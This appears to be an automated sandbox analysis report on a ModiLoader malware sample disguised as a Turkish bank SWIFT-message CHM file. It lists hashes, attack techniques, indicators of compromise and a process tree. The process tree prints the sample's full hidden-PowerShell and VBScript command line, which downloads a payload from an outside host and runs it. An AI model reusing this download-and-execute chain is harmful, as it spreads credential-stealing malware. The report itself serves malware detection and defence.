modiloader | e7fce30b5e5b5f550b4d1e773645530c94efee53821502c6253cadd7a7037cb5

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-01-2025 15:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ziraat_Bankasi_Swift_Mesaji_TXB04958T.chm
Size

75KB
MD5

8e024bab46d1fb2db38dd990521b953a
SHA1

e4884caf5bf755dffcbcc479e8e38dbe693c6de7
SHA256

e7fce30b5e5b5f550b4d1e773645530c94efee53821502c6253cadd7a7037cb5
SHA512

798da85936f4431dbbde9267f57e2ad2ec437d925e6cec9bfc6a708c7e6395af48be0078cf9b76d38fc47f316b115814718b49d4d28ed7eecbd54b707736f34a
SSDEEP

1536:dPgSDXMd7ehSISBV2FsXme6bARtAPhXUO5v:RgmXMd726VLmeVRKt5v

Score

10^/10

modiloader collection defense_evasion discovery execution persistence spyware stealer trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral2/memory/4372-50-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-55-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-57-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-61-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-64-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-70-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-78-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-88-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-105-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-113-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-112-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-110-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-109-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-106-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-89-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-103-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-101-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-97-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-83-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-111-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-95-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-94-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-93-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-108-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-91-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-107-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-90-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-104-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-87-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-102-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-100-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-86-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-99-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-85-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-98-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-84-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-96-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-82-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-81-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-80-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-92-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-79-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-77-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-76-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-75-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-74-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-73-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-72-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-71-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-69-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-68-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-67-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-66-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-65-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-63-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-62-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-60-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-59-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-58-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-56-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2
behavioral2/memory/4372-54-0x0000000002970000-0x0000000003970000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4980	powershell.exe
4164	powershell.exe
4364	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	xgtukcbW.pif
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Trading_AIBot.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk	Trading_AIBot.exe

Executes dropped EXE 20 IoCs

pid	Process
1000	ript.exe
4372	x.exe
4168	svchost.pif
3556	alpha.pif
1368	Upha.pif
2804	alpha.pif
2624	Upha.pif
3588	alpha.pif
3600	aken.pif
3972	xgtukcbW.pif
4828	alg.exe
5032	DiagnosticsHub.StandardCollector.Service.exe
2460	fxssvc.exe
672	elevation_service.exe
3588	elevation_service.exe
3704	Trading_AIBot.exe
2084	Microsofts.exe
1476	maintenanceservice.exe
4416	OSE.EXE
4824	apihost.exe

Loads dropped DLL 1 IoCs

pid	Process
4168	svchost.pif

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wbckutgx = "C:\\Users\\Public\\Wbckutgx.url"	x.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
3108	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	drive.google.com
26	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
67	reallyfreegeoip.org
59	checkip.dyndns.org
66	reallyfreegeoip.org

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	xgtukcbW.pif
File opened for modification	C:\Windows\system32\fxssvc.exe	xgtukcbW.pif
File opened for modification	C:\Windows\system32\AppVClient.exe	alg.exe
File opened for modification	C:\Windows\system32\dllhost.exe	alg.exe
File opened for modification	C:\Windows\System32\alg.exe	xgtukcbW.pif
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\36b8d10199262766.bin	alg.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	xgtukcbW.pif
File opened for modification	C:\Windows\system32\dllhost.exe	xgtukcbW.pif

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4372 set thread context of 3972	4372	x.exe	118

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Internet Explorer\ielowutil.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javah.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jconsole.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\schemagen.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jjs.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\keytool.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jps.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\idlj.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaw.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\serialver.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\klist.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\pack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmiregistry.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\123.0.6312.123\chrome_installer.exe	alg.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log	maintenanceservice.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jinfo.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\iediagcmd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javap.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\wsimport.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javacpl.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\extcheck.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	xgtukcbW.pif
File opened for modification	C:\Program Files\7-Zip\7zG.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jar.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\java.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdate.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateBroker.exe	alg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	alg.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	xgtukcbW.pif

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xgtukcbW.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Microsofts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trading_AIBot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apihost.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
4404	taskkill.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1130 = "Microsoft Modem Device Provider"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1134 = "Microsoft Routing Extension"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1131 = "Route through e-mail"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1132 = "Store in a folder"	fxssvc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1133 = "Print"	fxssvc.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5036	schtasks.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	30	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4824	apihost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4980	powershell.exe
4980	powershell.exe
4164	powershell.exe
4164	powershell.exe
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
3600	aken.pif
3600	aken.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif
4168	svchost.pif

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	4404	taskkill.exe
Token: SeDebugPrivilege	3600	aken.pif
Token: SeTakeOwnershipPrivilege	3972	xgtukcbW.pif
Token: SeDebugPrivilege	3972	xgtukcbW.pif
Token: SeAuditPrivilege	2460	fxssvc.exe
Token: SeDebugPrivilege	2084	Microsofts.exe
Token: SeDebugPrivilege	3704	Trading_AIBot.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	4824	apihost.exe
Token: SeDebugPrivilege	4828	alg.exe
Token: SeDebugPrivilege	4828	alg.exe
Token: SeDebugPrivilege	4828	alg.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1048	hh.exe
1048	hh.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1048 wrote to memory of 3108	1048	hh.exe	82
PID 1048 wrote to memory of 3108	1048	hh.exe	82
PID 3108 wrote to memory of 4384	3108	cmd.exe	84
PID 3108 wrote to memory of 4384	3108	cmd.exe	84
PID 3108 wrote to memory of 4980	3108	cmd.exe	85
PID 3108 wrote to memory of 4980	3108	cmd.exe	85
PID 4980 wrote to memory of 1000	4980	powershell.exe	86
PID 4980 wrote to memory of 1000	4980	powershell.exe	86
PID 3108 wrote to memory of 4164	3108	cmd.exe	87
PID 3108 wrote to memory of 4164	3108	cmd.exe	87
PID 4164 wrote to memory of 4236	4164	powershell.exe	88
PID 4164 wrote to memory of 4236	4164	powershell.exe	88
PID 3108 wrote to memory of 4404	3108	cmd.exe	90
PID 3108 wrote to memory of 4404	3108	cmd.exe	90
PID 4236 wrote to memory of 3488	4236	cmd.exe	92
PID 4236 wrote to memory of 3488	4236	cmd.exe	92
PID 4236 wrote to memory of 4372	4236	cmd.exe	93
PID 4236 wrote to memory of 4372	4236	cmd.exe	93
PID 4236 wrote to memory of 4372	4236	cmd.exe	93
PID 4372 wrote to memory of 1316	4372	x.exe	100
PID 4372 wrote to memory of 1316	4372	x.exe	100
PID 4372 wrote to memory of 1316	4372	x.exe	100
PID 4372 wrote to memory of 4540	4372	x.exe	103
PID 4372 wrote to memory of 4540	4372	x.exe	103
PID 4372 wrote to memory of 4540	4372	x.exe	103
PID 4540 wrote to memory of 4168	4540	cmd.exe	105
PID 4540 wrote to memory of 4168	4540	cmd.exe	105
PID 4168 wrote to memory of 4280	4168	svchost.pif	106
PID 4168 wrote to memory of 4280	4168	svchost.pif	106
PID 4280 wrote to memory of 4076	4280	cmd.exe	108
PID 4280 wrote to memory of 4076	4280	cmd.exe	108
PID 4280 wrote to memory of 1364	4280	cmd.exe	109
PID 4280 wrote to memory of 1364	4280	cmd.exe	109
PID 4280 wrote to memory of 4760	4280	cmd.exe	110
PID 4280 wrote to memory of 4760	4280	cmd.exe	110
PID 4280 wrote to memory of 3556	4280	cmd.exe	111
PID 4280 wrote to memory of 3556	4280	cmd.exe	111
PID 3556 wrote to memory of 1368	3556	alpha.pif	112
PID 3556 wrote to memory of 1368	3556	alpha.pif	112
PID 4280 wrote to memory of 2804	4280	cmd.exe	113
PID 4280 wrote to memory of 2804	4280	cmd.exe	113
PID 2804 wrote to memory of 2624	2804	alpha.pif	114
PID 2804 wrote to memory of 2624	2804	alpha.pif	114
PID 4280 wrote to memory of 3588	4280	cmd.exe	115
PID 4280 wrote to memory of 3588	4280	cmd.exe	115
PID 3588 wrote to memory of 3600	3588	alpha.pif	116
PID 3588 wrote to memory of 3600	3588	alpha.pif	116
PID 4372 wrote to memory of 3972	4372	x.exe	118
PID 4372 wrote to memory of 3972	4372	x.exe	118
PID 4372 wrote to memory of 3972	4372	x.exe	118
PID 4372 wrote to memory of 3972	4372	x.exe	118
PID 4372 wrote to memory of 3972	4372	x.exe	118
PID 3972 wrote to memory of 3704	3972	xgtukcbW.pif	125
PID 3972 wrote to memory of 3704	3972	xgtukcbW.pif	125
PID 3972 wrote to memory of 3704	3972	xgtukcbW.pif	125
PID 3972 wrote to memory of 2084	3972	xgtukcbW.pif	127
PID 3972 wrote to memory of 2084	3972	xgtukcbW.pif	127
PID 3972 wrote to memory of 2084	3972	xgtukcbW.pif	127
PID 3704 wrote to memory of 4364	3704	Trading_AIBot.exe	129
PID 3704 wrote to memory of 4364	3704	Trading_AIBot.exe	129
PID 3704 wrote to memory of 4364	3704	Trading_AIBot.exe	129
PID 3704 wrote to memory of 5036	3704	Trading_AIBot.exe	130
PID 3704 wrote to memory of 5036	3704	Trading_AIBot.exe	130
PID 3704 wrote to memory of 5036	3704	Trading_AIBot.exe	130

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Microsofts.exe

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Ziraat_Bankasi_Swift_Mesaji_TXB04958T.chm
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:3108
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:4384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4980
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      PID:1000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4236
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:3488
